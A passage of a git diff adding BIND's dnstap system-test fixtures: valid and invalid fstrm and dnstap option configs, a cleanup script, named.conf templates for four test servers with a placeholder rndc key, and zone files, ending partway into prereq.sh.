b/bin/tests/system/dnstap/bad-fstrm-reopen-interval.conf new file mode 100644 index 0000000..fd673d6 --- /dev/null +++ b/bin/tests/system/dnstap/bad-fstrm-reopen-interval.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + fstrm-set-reopen-interval 1x; +}; diff --git a/bin/tests/system/dnstap/bad-fstrm-set-buffer-hint-max.conf b/bin/tests/system/dnstap/bad-fstrm-set-buffer-hint-max.conf new file mode 100644 index 0000000..cdab66b --- /dev/null +++ b/bin/tests/system/dnstap/bad-fstrm-set-buffer-hint-max.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + fstrm-set-buffer-hint 65537; +}; diff --git a/bin/tests/system/dnstap/bad-fstrm-set-buffer-hint-min.conf b/bin/tests/system/dnstap/bad-fstrm-set-buffer-hint-min.conf new file mode 100644 index 0000000..c5444e9 --- /dev/null +++ b/bin/tests/system/dnstap/bad-fstrm-set-buffer-hint-min.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + fstrm-set-buffer-hint 1023; +}; diff --git a/bin/tests/system/dnstap/bad-fstrm-set-flush-timeout-max.conf b/bin/tests/system/dnstap/bad-fstrm-set-flush-timeout-max.conf new file mode 100644 index 0000000..05ab1d9 --- /dev/null +++ b/bin/tests/system/dnstap/bad-fstrm-set-flush-timeout-max.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + fstrm-set-flush-timeout 0; +}; diff --git a/bin/tests/system/dnstap/bad-fstrm-set-flush-timeout-min.conf b/bin/tests/system/dnstap/bad-fstrm-set-flush-timeout-min.conf new file mode 100644 index 0000000..398b1ab --- /dev/null +++ b/bin/tests/system/dnstap/bad-fstrm-set-flush-timeout-min.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + fstrm-set-flush-timeout 601; +}; diff --git a/bin/tests/system/dnstap/bad-fstrm-set-input-queue-size-max.conf b/bin/tests/system/dnstap/bad-fstrm-set-input-queue-size-max.conf new file mode 100644 index 0000000..d6c4120 --- /dev/null +++ b/bin/tests/system/dnstap/bad-fstrm-set-input-queue-size-max.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + fstrm-set-input-queue-size 1; +}; diff --git a/bin/tests/system/dnstap/bad-fstrm-set-input-queue-size-min.conf b/bin/tests/system/dnstap/bad-fstrm-set-input-queue-size-min.conf new file mode 100644 index 0000000..787f656 --- /dev/null +++ b/bin/tests/system/dnstap/bad-fstrm-set-input-queue-size-min.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + fstrm-set-input-queue-size 16385; +}; diff --git a/bin/tests/system/dnstap/bad-fstrm-set-input-queue-size-po2.conf b/bin/tests/system/dnstap/bad-fstrm-set-input-queue-size-po2.conf new file mode 100644 index 0000000..ae713d3 --- /dev/null +++ b/bin/tests/system/dnstap/bad-fstrm-set-input-queue-size-po2.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + fstrm-set-input-queue-size 513; +}; diff --git a/bin/tests/system/dnstap/bad-fstrm-set-output-notify-threshold.conf b/bin/tests/system/dnstap/bad-fstrm-set-output-notify-threshold.conf new file mode 100644 index 0000000..643e2b8 --- /dev/null +++ b/bin/tests/system/dnstap/bad-fstrm-set-output-notify-threshold.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + fstrm-set-output-notify-threshold 0; +}; diff --git a/bin/tests/system/dnstap/bad-fstrm-set-output-queue-size-max.conf b/bin/tests/system/dnstap/bad-fstrm-set-output-queue-size-max.conf new file mode 100644 index 0000000..853713f --- /dev/null +++ b/bin/tests/system/dnstap/bad-fstrm-set-output-queue-size-max.conf @@ -0,0 +1,19 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + /* + * This value is system dependent and matches IOV_MAX. + */ + fstrm-set-output-queue-size 10000000; +}; diff --git a/bin/tests/system/dnstap/bad-fstrm-set-output-queue-size-min.conf b/bin/tests/system/dnstap/bad-fstrm-set-output-queue-size-min.conf new file mode 100644 index 0000000..7940c89 --- /dev/null +++ b/bin/tests/system/dnstap/bad-fstrm-set-output-queue-size-min.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + fstrm-set-output-queue-size 1; +}; diff --git a/bin/tests/system/dnstap/bad-fstrm-set-reopen-interval-max.conf b/bin/tests/system/dnstap/bad-fstrm-set-reopen-interval-max.conf new file mode 100644 index 0000000..9cfa9e3 --- /dev/null +++ b/bin/tests/system/dnstap/bad-fstrm-set-reopen-interval-max.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + fstrm-set-reopen-interval 601; +}; diff --git a/bin/tests/system/dnstap/bad-fstrm-set-reopen-interval-min.conf b/bin/tests/system/dnstap/bad-fstrm-set-reopen-interval-min.conf new file mode 100644 index 0000000..be6a640 --- /dev/null +++ b/bin/tests/system/dnstap/bad-fstrm-set-reopen-interval-min.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + fstrm-set-reopen-interval 0; +}; diff --git a/bin/tests/system/dnstap/bad-missing-dnstap-output-view.conf b/bin/tests/system/dnstap/bad-missing-dnstap-output-view.conf new file mode 100644 index 0000000..853da36 --- /dev/null +++ b/bin/tests/system/dnstap/bad-missing-dnstap-output-view.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view "view" { + dnstap { client; auth; }; +}; diff --git a/bin/tests/system/dnstap/bad-missing-dnstap-output.conf b/bin/tests/system/dnstap/bad-missing-dnstap-output.conf new file mode 100644 index 0000000..b5565e2 --- /dev/null +++ b/bin/tests/system/dnstap/bad-missing-dnstap-output.conf @@ -0,0 +1,17 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dnstap { client; auth; }; + recursion yes; +}; diff --git a/bin/tests/system/dnstap/bad-size-version.conf b/bin/tests/system/dnstap/bad-size-version.conf new file mode 100644 index 0000000..8e31528 --- /dev/null +++ b/bin/tests/system/dnstap/bad-size-version.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dnstap-output unix "/tmp/dnstap.sock" size 10k versions 3; +}; diff --git a/bin/tests/system/dnstap/clean.sh b/bin/tests/system/dnstap/clean.sh new file mode 100644 index 0000000..36f1ea3 --- /dev/null +++ b/bin/tests/system/dnstap/clean.sh @@ -0,0 +1,31 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f */named.conf +rm -f */named.memstats +rm -f */named.run +rm -f */named.run.prev +rm -f */named.stats +rm -f dig.out* +rm -f dnstap.out dnstap.hex +rm -f dnstap.out.save +rm -f fstrm_capture.out.* +rm -f ns*/dnstap.out +rm -f ns*/dnstap.out.save +rm -f ns*/dnstap.out.save.? +rm -f ns*/managed-keys.bind* +rm -f ns*/named.lock +rm -f ns2/dnstap.out.* +rm -f ns2/example.db ns2/example.db.jnl +rm -f ns3/dnstap.out.* +rm -f ydump.out diff --git a/bin/tests/system/dnstap/good-dnstap-in-options.conf b/bin/tests/system/dnstap/good-dnstap-in-options.conf new file mode 100644 index 0000000..17feb5e --- /dev/null +++ b/bin/tests/system/dnstap/good-dnstap-in-options.conf @@ -0,0 +1,18 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dnstap-output unix "/var/run/named/dnstap.sock"; + dnstap-identity hostname; + dnstap { client response; }; +}; diff --git a/bin/tests/system/dnstap/good-dnstap-in-view.conf b/bin/tests/system/dnstap/good-dnstap-in-view.conf new file mode 100644 index 0000000..2c17f6c --- /dev/null +++ b/bin/tests/system/dnstap/good-dnstap-in-view.conf @@ -0,0 +1,21 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dnstap-output unix "/var/run/named/dnstap.sock"; + dnstap-identity hostname; +}; + +view "view" { + dnstap { client response; }; +}; diff --git a/bin/tests/system/dnstap/good-fstrm-reopen-interval.conf b/bin/tests/system/dnstap/good-fstrm-reopen-interval.conf new file mode 100644 index 0000000..d525262 --- /dev/null +++ b/bin/tests/system/dnstap/good-fstrm-reopen-interval.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + fstrm-set-reopen-interval 5m; +}; diff --git a/bin/tests/system/dnstap/good-fstrm-set-buffer-hint.conf b/bin/tests/system/dnstap/good-fstrm-set-buffer-hint.conf new file mode 100644 index 0000000..c550647 --- /dev/null +++ b/bin/tests/system/dnstap/good-fstrm-set-buffer-hint.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + fstrm-set-buffer-hint 8192; +}; diff --git a/bin/tests/system/dnstap/good-fstrm-set-flush-timeout.conf b/bin/tests/system/dnstap/good-fstrm-set-flush-timeout.conf new file mode 100644 index 0000000..dd9abf0 --- /dev/null +++ b/bin/tests/system/dnstap/good-fstrm-set-flush-timeout.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + fstrm-set-flush-timeout 1; +}; diff --git a/bin/tests/system/dnstap/good-fstrm-set-input-queue-size.conf b/bin/tests/system/dnstap/good-fstrm-set-input-queue-size.conf new file mode 100644 index 0000000..d01b8f8 --- /dev/null +++ b/bin/tests/system/dnstap/good-fstrm-set-input-queue-size.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + fstrm-set-input-queue-size 512; +}; diff --git a/bin/tests/system/dnstap/good-fstrm-set-output-notify-threshold.conf b/bin/tests/system/dnstap/good-fstrm-set-output-notify-threshold.conf new file mode 100644 index 0000000..2619dc0 --- /dev/null +++ b/bin/tests/system/dnstap/good-fstrm-set-output-notify-threshold.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + fstrm-set-output-notify-threshold 32; +}; diff --git a/bin/tests/system/dnstap/good-fstrm-set-output-queue-model-mpsc.conf b/bin/tests/system/dnstap/good-fstrm-set-output-queue-model-mpsc.conf new file mode 100644 index 0000000..a81ff7c --- /dev/null +++ b/bin/tests/system/dnstap/good-fstrm-set-output-queue-model-mpsc.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + fstrm-set-output-queue-model mpsc; +}; diff --git a/bin/tests/system/dnstap/good-fstrm-set-output-queue-model-spsc.conf b/bin/tests/system/dnstap/good-fstrm-set-output-queue-model-spsc.conf new file mode 100644 index 0000000..7b394eb --- /dev/null +++ b/bin/tests/system/dnstap/good-fstrm-set-output-queue-model-spsc.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + fstrm-set-output-queue-model spsc; +}; diff --git a/bin/tests/system/dnstap/good-fstrm-set-output-queue-size.conf b/bin/tests/system/dnstap/good-fstrm-set-output-queue-size.conf new file mode 100644 index 0000000..87bf028 --- /dev/null +++ b/bin/tests/system/dnstap/good-fstrm-set-output-queue-size.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + fstrm-set-output-queue-size 64; +}; diff --git a/bin/tests/system/dnstap/good-fstrm-set-reopen-interval.conf b/bin/tests/system/dnstap/good-fstrm-set-reopen-interval.conf new file mode 100644 index 0000000..116d3ae --- /dev/null +++ b/bin/tests/system/dnstap/good-fstrm-set-reopen-interval.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + fstrm-set-reopen-interval 5; +}; diff --git a/bin/tests/system/dnstap/good-size-unlimited.conf b/bin/tests/system/dnstap/good-size-unlimited.conf new file mode 100644 index 0000000..8cb9712 --- /dev/null +++ b/bin/tests/system/dnstap/good-size-unlimited.conf @@ -0,0 +1,17 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dnstap-output file "/tmp/dnstap.log" + size unlimited versions unlimited suffix increment; +}; diff --git a/bin/tests/system/dnstap/good-size-version.conf b/bin/tests/system/dnstap/good-size-version.conf new file mode 100644 index 0000000..ca1fba3 --- /dev/null +++ b/bin/tests/system/dnstap/good-size-version.conf @@ -0,0 +1,17 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dnstap-output file "/tmp/dnstap.log" + size 10k versions 3 suffix timestamp; +}; diff --git a/bin/tests/system/dnstap/large-answer.fstrm b/bin/tests/system/dnstap/large-answer.fstrm Binary files differnew file mode 100644 index 0000000..873b315 --- /dev/null +++ b/bin/tests/system/dnstap/large-answer.fstrm diff --git a/bin/tests/system/dnstap/ns1/named.conf.in b/bin/tests/system/dnstap/ns1/named.conf.in new file mode 100644 index 0000000..c2c0087 --- /dev/null +++ b/bin/tests/system/dnstap/ns1/named.conf.in @@ -0,0 +1,47 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + statistics-file "named.stats"; + dnstap-identity "ns1"; + dnstap-version "xxx"; + dnstap-output file "dnstap.out" size 30k versions 10; + dnstap { all; }; + send-cookie no; + require-server-cookie no; + dnssec-validation yes; + qname-minimization disabled; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type primary; + file "root.db"; +}; diff --git a/bin/tests/system/dnstap/ns1/root.db b/bin/tests/system/dnstap/ns1/root.db new file mode 100644 index 0000000..17780d1 --- /dev/null +++ b/bin/tests/system/dnstap/ns1/root.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example. NS ns2.example. +ns2.example. A 10.53.0.2 diff --git a/bin/tests/system/dnstap/ns2/example.db.in b/bin/tests/system/dnstap/ns2/example.db.in new file mode 100644 index 0000000..7f88dec --- /dev/null +++ b/bin/tests/system/dnstap/ns2/example.db.in @@ -0,0 +1,30 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example. NS ns2.example. +ns2.example. A 10.53.0.2 + +$ORIGIN example. +a A 10.0.0.1 +a A 10.0.0.3 +a A 10.0.0.5 + MX 10 mail.example. + +mail A 10.0.0.2 diff --git a/bin/tests/system/dnstap/ns2/named.conf.in b/bin/tests/system/dnstap/ns2/named.conf.in new file mode 100644 index 0000000..1c1713a --- /dev/null +++ b/bin/tests/system/dnstap/ns2/named.conf.in @@ -0,0 +1,53 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; + statistics-file "named.stats"; + dnstap-identity "ns2"; + dnstap-version "xxx"; + dnstap-output file "dnstap.out" size unlimited versions unlimited; + dnstap { all; }; + send-cookie no; + require-server-cookie no; + dnssec-validation yes; + qname-minimization disabled; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type primary; + file "example.db"; + allow-update { any; }; +}; diff --git a/bin/tests/system/dnstap/ns3/named.args b/bin/tests/system/dnstap/ns3/named.args new file mode 100644 index 0000000..fb42af2 --- /dev/null +++ b/bin/tests/system/dnstap/ns3/named.args @@ -0,0 +1,2 @@ +# Using "-n 1" allows GL #1795 to be reliably reproduced +-D dnstap-ns3 -X named.lock -m record,size,mctx -c named.conf -d 99 -g -U 4 -n 1 -T maxcachesize=2097152 diff --git a/bin/tests/system/dnstap/ns3/named.conf.in b/bin/tests/system/dnstap/ns3/named.conf.in new file mode 100644 index 0000000..24320ed --- /dev/null +++ b/bin/tests/system/dnstap/ns3/named.conf.in @@ -0,0 +1,50 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + directory "."; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; + dnstap-identity "ns3"; + dnstap-version "xxx"; + dnstap-output file "dnstap.out"; + dnstap { all; }; + send-cookie no; + require-server-cookie no; + minimal-responses no; + dnssec-validation yes; + qname-minimization disabled; +}; + +server 10.53.0.1 { tcp-only yes; }; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; diff --git a/bin/tests/system/dnstap/ns4/named.conf.in b/bin/tests/system/dnstap/ns4/named.conf.in new file mode 100644 index 0000000..e821f5e --- /dev/null +++ b/bin/tests/system/dnstap/ns4/named.conf.in @@ -0,0 +1,49 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + directory "."; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; + dnstap-identity "ns4"; + dnstap-version "xxx"; + dnstap-output unix "dnstap.out"; + dnstap { all; }; + send-cookie no; + require-server-cookie no; + dnssec-validation yes; + qname-minimization disabled; +}; + +server 10.53.0.1 { tcp-only yes; }; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; diff --git a/bin/tests/system/dnstap/prereq.sh b/bin/tests/system/dnstap/prereq.sh new file mode 100644 index 0000000..f0748f3 --- /dev/null +++ b/bin/tests/system/dnstap/prereq.sh @@ -0,0 +1,20 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") 